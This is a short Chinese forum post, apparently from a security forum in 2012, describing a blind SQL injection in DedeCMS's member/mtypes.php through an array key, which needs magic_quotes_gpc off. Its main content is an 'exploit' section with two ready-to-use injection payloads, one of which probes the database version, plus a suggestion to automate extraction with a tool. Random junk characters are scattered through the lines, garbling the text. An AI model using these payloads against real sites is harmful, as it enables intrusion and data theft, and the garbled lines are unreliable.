需要magic_quotes_gpc = Off,所以说是鸡肋啊.
, L4 [1 d; d; @' g7 `
4 F! O/ d0 g; z e$ b
" s+ z, s& \* D/ Y2 T+ ]% Q发生在数组key里的注射漏洞,有点意思.1 a1 M) M) M/ ?) l4 W r* B
5 E- R8 g3 X& E# m2 b
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
5 B7 o+ q6 p- K8 D- y
7 L( {6 d3 x# ?) n+ g, X% shttp://www.xxx.com /dede/member/mtypes.php?dopost=save
& D& l7 Z! E6 c+ [
+ |/ G# j- m) n" Yexploit:
7 g% m% _4 C+ y7 o5 Q" W0 H' tmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r" \9 B: \, q5 B5 V# s
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
& |) j: O1 _5 Z4 q |
发表于 2012-12-20 08:08:09
收藏
支持
反对